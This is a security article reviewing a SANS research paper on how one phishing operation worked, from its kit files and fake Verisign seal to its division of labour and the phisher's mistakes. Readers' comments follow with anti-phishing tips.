Security

The anatomy of a phishing operation

There are far better things than being phished, like writing about how not to get phished. Michael P. Kassner reviews a research paper that provides amazing insight into a successful phishing operation.

In the spring of 2009, I became someone's phishee. You'd think a person who writes about IT security would know better. But I didn't. Of all the emotions I felt, embarrassment was by far the worst. Especially since, only days earlier, I penned the article, "Phishing: Is that website real or not?"

While in my "poor me" funk, I happened to remember a well-worn cliché, and decided I might as well make the proverbial lemonade instead of sulking. Or better yet, ask the experts how to avoid digital con artists like the one I bumped into, and then write about it.

To that end, I'd like you to meet someone I wish I'd known back then. His name is John Brozycki. He understands phishing, every sordid detail; his credentials: a bucket full of GIAC certifications, years of experience, and a willingness to share what he knows.

Ironically, right around the time I was phished, John was writing "Inside a Phish," a paper about one particular phisher, his escapades, and eventual take-down by authorities. It is one of the best commentaries I've read on the inner workings of a successful phishing operation.

What makes this paper valuable was John's ability to piece together details of how a phishing attack was carried out using information from both the phisher and the phishee:

I had often wished I could be a "fly on the wall" and see how a phish operated, understanding that it wouldn't represent all phishers any more than watching one bank heist would represent all bank robbers. Regardless, I knew there could be a lot of information in the emails, and I found myself immediately asking if I could study the data.

It took a while, several years in fact, before John finally obtained permission to look at the case records involved in the investigation:

I was told I couldn't while it was an active investigation. After a few years, my periodic requests finally got a positive response. I learned I could come in to review the data, agreeing not to use details such as names, IP addresses, and organizations. I wanted to study the methods and workings of the phish.

John also explained why it was important to audit the involved financial institution:

As I started reviewing the information, I also began thinking about the financial institution this phish was perpetrated against. What were they doing and how were they reacting while the phish was in play? What was done effectively and what could have been done better?

An example

Before we get to the details of John's investigation, I thought it would be best to explain the rudiments of phishing. A phish consists of two basic components: requests and responses.

Request: The intended victim receives an email (The anatomy of a scam email message) -- supposedly from an organization (usually financial) that the intended victim belongs to -- carrying a request composed with one thing in mind -- get the victim to respond. The following slide is an example of such a request ( Both slides courtesy of Cadzow.com).

Response: The victim decides whether to click on the link in the email or not. If the victim clicks the link, the following phishing webpage opens displaying yet another request.

As you can see, the phisher is attempting to obtain sensitive financial information. And if the victim responds, the phisher wins. According to my source (unverified), this phishing campaign fooled more than a few Citibank members. Now let's see what John's investigation turned up.

Phishing kits

As part of the agreement with law enforcement, John promised not to reveal any discernible information; so meet Bob -- the nasty phisher -- and GIAC Bank -- the copycatted financial institution. By agreeing, John was able to look at the phishing kit and email conversations Bob had with other operatives.

For those not familiar with phishing kits, it is an archive of all the files required to make the phishing website. John mentions why dissecting a phishing kit is helpful:

When you can get it [phishing kit], it can provide a wealth of information. Opening the kit and reviewing the source code from the PHP scripts, I found the email address where the phished data was being sent.

I thought it might be interesting to look at a few of the files John found in the GIAC Bank phishing kit:

  • Config.php configures the hosting URL, the phisher's blind-drop email address where account information is to be sent, and the name of the financial institution being targeted.
  • Index.php creates the front page asking for logon information. After entering the appropriate information and clicking on the submit button, the data is posted to Login.php.
  • Login.php sets up the web form that requests the following: card number, expiration date, cvv2 (number printed on the card's backside), and PIN.

A fake website similar enough to fool a majority of people, asking for sensitive financial account information -- what's not to like? To make it even more official looking, Bob made sure the phishing website gave the impression of having the correct digital certificates.

The GIAC Bank displays a Secured by Verisign image on the bank's webpages. Bob requested the element also be on the phishing website -- no small task as John explains:

GIAC Bank uses Verisign for the site's digital certificate, and runs an element on its page provided by Verisign to help assure visitors that the page they are viewing is both authentic and secure. The phish has substituted an Adobe Shockwave file with an animation that mimics the real Verisign element (Figure 11). This is a clever touch. Even nicer, this animation is made from vector graphics, not an image capture from the real logo.

Email logs

While the investigation was going on, John helped law enforcement decipher the email logs, but was not privy to the actual emails for several years (remember John had to wait until the investigation ended). Just from viewing the logs, John was convinced the actual emails would provide an immense amount of operational information.

Once the authorities gave John access to the emails, he learned something interesting. Bob did very little of the actual work; he was a coordinator, running multiple phishing operations, each targeting five different financial institutions. The jobs Bob parceled out were:

  • Reconnaissance of potential victims, and what financial institutions they were associated with was an important first step.
  • Target address listings of victims using common financial institutions were needed.
  • Mail delivery of the phishing emails to each of the potential victims.
  • Compromise web-servers so phishing kits could be installed without the actual owner's knowledge.
  • Phish-kit creation and modification was critical to afford the best chance of fooling victims.
  • Monetization of compromised card accounts to pay Bob and all the third-party operators involved.

This should give you an idea what's required to run a successful phishing operation, and the depth phishers will go to when there's money to be made.

What Bob did wrong

According to John, Bob made several mistakes. First, he did not delete the phish kit from the compromised web servers. That allowed authorities to warn the targeted financial institutions, helping deflect a majority of the attack's effect. Bob also kept a log of the victims on the web server. The list of victims gave authorities the chance to warn many of the victims soon enough to prevent their accounts from being compromised.

Final thoughts

A couple of things stand out in my mind. Experts comment how criminals run their operations in a business-like manner. And, that appears to be true in Bob's case. There is a point of departure though -- financing; handling money appears to be a bit more creative than what I'm used to. Several times, John pointed out, if Bob needed anything -- personal or for his operation -- he would simply use stolen bankcards. That's one way of eliminating risk-adverse investments.

This article was a complex piece to pull together; I can imagine the effort John went through during his years of research. That's why I want to extend my heartfelt thanks to John, and SANS as well, for allowing me to use parts of John's paper in this article.

I have been steadily reporting on phishing since 2009, and many of the articles are still relevant. If you are interested, they can be found here.

About

Information is my field...Writing is my passion...Coupling the two is my mission.

28 comments
ProfQuill
ProfQuill

A pretty good clue that an email IS legitimate is if includes your actual name (even first name should be enough), or something like the last 4 digits of your account number, pieces of data that a phisher wouldn't have. I agree with another poster that institutions should make their fraud reporting email address more prominent, I've had to dig pretty deep on some sites. Many tend to use 'abuse@bank.com', but not all, my suggestion is that EVERY site accept such an address. I have to chuckle at the Nigerian scams alleging an inheritance to someone 'with the same surname as yours', but of course they don't say what that name is. Obviously, they have no clue and it's a mass mailing anyway. Point emphasized, institutions should make it policy that their emails include a tidbit of personal info that a scammer wouldn't know. So if you know your institution does that and you get email without it, then you can treat that with high suspicion. I guess there's some danger a scammer could intercept legitimate email and gather that info, seems like a real stretch though.

TRgscratch
TRgscratch

1 - as I have told my mother many times: don't ever type in anything anywhere that it seems like they should know ("please enter your username"); or, never type in anything, anywhere, especially stuff they shouldn't know ("enter your PIN") 1a - if it's legitimate, they will make more effort to contact you 2 - why don't all institutions make their "send us any phony-looking emails here" address more prominent on their web sites? don't they want to know that someone out there is screwing with their customers? I got what I thought might be a phishing email from a well-known vendor, and could not find a the 'send abuse to' email address anywhere on their web site. I finally found it in a blog. having said all that, I sent a phony-looking email to a vendor, only to get a reply from them that it was legit, and apologising (and, yes, I understand that the apology could have been phishing, but it didn't ask for anything)

captainanalog
captainanalog

I don't know about my credit cards, but eBay and Paypal have a nice anti-phishing feature. If you get suspicious email 'from' them you can forward it to spoof@ebay.com. Chances are they will confirm that the mail is a phishing expedition and they will investigate.

UIS
UIS

Protección y Prevención II – Estafas, Robos y Agresiones son Evitables 1 / 2 http://goo.gl/vIlDI Protección y Prevención II – Estafas, Robos y Otras Agresiones son Evitables (Cont.) 2 / 2 http://goo.gl/bDF5V Protección y Prevención IIIa – Predadores Políticos o Sociales. http://goo.gl/d15nP Protección y Prevención IIIb – Esquemas de Actuación de los Predadores Sociales. http://goo.gl/HZng8

mcs
mcs

Your article is good and makes interesting reading for everyone. I have been observing that most people are very eager to prove they are more intelligent than crooks and start pointing out what mistakes they did. Was that the objective of this article? Are not we helping other unknown crooks by educating them what mistakes they should not do? Why mention what mistakes they did? Instead, we must concentrate on what a user must observe and do or not do to avoid such pitfalls and save them instead of helping crooks to be better and better by exposing methods used as well as mistakes to be avoided.

horace14
horace14

It is striking how the phishing operation follows the structure of a "big con". As detailed in "The Big Con" - David Maurer (1940) describing the operations of confidence men in the early 20th century. Many "ropers" collect potential victims (marks), that are played by the "inside man" in the "shop". In the phishing operation described, the "inside man" creates the website( the "shop") and probably crafts the emails. The "ropers" discovers the email addresses, supporting details and sends the emails. As noted there is also a support function to "monetise" the information collected. The different layers work together to maximise the value (of the inside man's skills) and minimise the risk for everyone involved

Pats3
Pats3

Would happen less if people would go directly to the financial institution that supposedly is asking for that info. They tell us time and time again "we do not ask for personal info in an e-mail". Not a difficult thing to do - don't be lazy about your own safety.

skootert221
skootert221

Common sense is always key in these situations. Unfortunately, that is difficult to learn and apply these days. Educating people proactively is the only way to really have the edge on phishing and other scams.

xxing14
xxing14

Welcome to http://www.likesurprise.com// where is the most popular Panthers online shop. We are professional supplier in wholesale Panthers shoes,clothes,bags and so on. Once you visit our website, you will be find many many surprises in our site. Newest stuff will be selling in our website in the first time. michael kors handbags cheape, cheap air force ones and so on. Welcome worldwide customer visit our site and buying online. Let us make thing more easier at http://www.likesurprise.com//

wizard57m-cnet
wizard57m-cnet

these types of phish attempts would not result in anything for the perpetrator. 1. Very very few, if any, internet enabled financial institutions, nor even most service providers with an internet/web presence, will request a users email address without some prior contact. If you doubt the validity, do not respond to the email you received, instead initiate contact with the provider at their official website or via telephone. 2. Of all the phishing attempt emails I have seen, all of them contain various errors, either spelling, grammar or other. If the email contains errors, it is probably not official. Verify via official contact means. One final thought, if you have NEVER given your email address to some entity, then HOW could they possibly be needing to "confirm" your address, especially with your financial card information?

JCitizen
JCitizen

The spammer/phisher's have vast data bases for such things - I doubt mine was a spear phish - all they have to do is sniff the packets of email and match it to an address, and they can get your real name. If email were SSL all the way like it should be, this wouldn't be as likely to happen. Plus, once a vendor is compromised, which is what I believe happened in my case, the customer data bases can be harvested and phish email sent to all of them. It is not hard to guess that all have PayPal accounts or they wouldn't have been a customer of the vendor that got cracked. I remember reading in the news of several of my vendors getting compromised not long before my phish mail arrived. I'm sure that is where they got their data.

Michael Kassner
Michael Kassner

Is excellent. I intend to use that in my explanations from now on.

SimonHobson
SimonHobson

PayPal are one of the offenders who send out emails with instructions like "Click here and review your transactions". If the institution is training users to click links in emails, then what hope do we have ? I've also been on the end of phone calls which start with "I need some security information from you" - needless to say I refused and complained to the bank who didn't seem to see it as a problem !

Michael Kassner
Michael Kassner

And thank Google Translate. That was interesting reading, and a viewpoint I had not considered.

Michael Kassner
Michael Kassner

Hindsight has a way of making us look more intelligent, but history will prove bad guys to be proactive, whereas the good guys are for the most part reactive, a step or two behind if you will.

Michael Kassner
Michael Kassner

I did not make that connection, but I sure do now. I remember it was hard to believe it was nonfiction. The connection I made was with the movie "The Sting." Actually, I now remember reading that Maurer's book probably precipitated 'The Sting."

JCitizen
JCitizen

of any phrase in the email will always provide hits too - not that a person should try to follow any email link anyway if no frauds are found.

Michael Kassner
Michael Kassner

Now there is no asking for information in the email. All they ask is for you to click on the link, bringing you to the supposed website. More or less what the real banks are doing.

Michael Kassner
Michael Kassner

I see the trick is taking that extra second to think about it before clicking. Rushing is where mistakes are made.

JCitizen
JCitizen

On number 1 - I have been stupidly contacted by several critical institutions just the way you say they shouldn't - I found their contact numbers in an outside search and called them to see what was up and was surprised to find they actually sent the emails!!! Now my next move was to roundly criticize them for doing that and explain why. Most of the time they take this very well and promise to contact a team leader to look into the matter. On number 2 - I had one perfect phishing email once, but even on the ones that are not perfect, the criminals are very good at copying the ambiance of the institution that is supposedly sending the email. This could take an otherwise aware individual by surprise, because so many institutions are crazy about constantly changing their content, both in their emails, and web facing site page. This breeds confusion for the average user, and even makes my head spin sometimes. ?:| In fact sometimes the legit email get blocked by the email content filter for too many changes to server address naming conventions, suspicious content, or out right domain changes at a dizzying pace. Follow up indeed proves that they were previously approved sources!! :O

Michael Kassner
Michael Kassner

In this case, email addresses weren't requested, Bob knew them to begin with. Bob also knew which bank they used. I wasn't privy to any of the evidence, but I get the impression that the email and website were quite good. Would have to be if you even include an animated Verisign logo.

Michael Kassner
Michael Kassner

Has PayPal been doing that recently? Several years ago, I received email similar to that, but not for quite a while.

JCitizen
JCitizen

I was chumped by a VERY convincing PayPal phishing email once, and I got all the way to the login page before realizing what I'd done! Fortunately LastPass was dead, so that was my first indication I was at the wrong URL. This was a while back, but I don't remember any of the email page features being blocked, which is the 1st and foremost indication that the email is suspicious. Only approved emails are fully functional with applets and images intact. However - this crook was smart, he only used the minimum HTML coding, and there were almost no active images or other active links on the page. He was clever and used the illustrations without putting content with them, so the filter didn't catch it. However, hotmail may have asked if I approved active content from this source when I clicked the hyperlink, and I may have dismissed it because I fell head over heals for the visual clues. I know everyone will criticize me for using HTML email, but I like to trip the minefields just like my clients do; and right now my honey pot only works well with email spam for sources of malware, so I naturally encourage full content. I am more careful now, and always check the headers when any content is blocked, and if I'm not running the honeypot, I go to my institutions outside of email links and never use them of course. If I'm not sure about a header I send it to the target institutions phishing division, for analysis, to see how the process goes. Four out of Five emails are found to be phishing attacks this way. Hotmail has become better and better at blocking phishing email, and I always mark suspicious ones as phishing scams when I get them. Almost all of them are text now, and no illustrations, usually with just one link and no attachments. They are all obvious scams though, and a really good fooler hasn't made it past the filter on my accounts in a long time.

Editor's Picks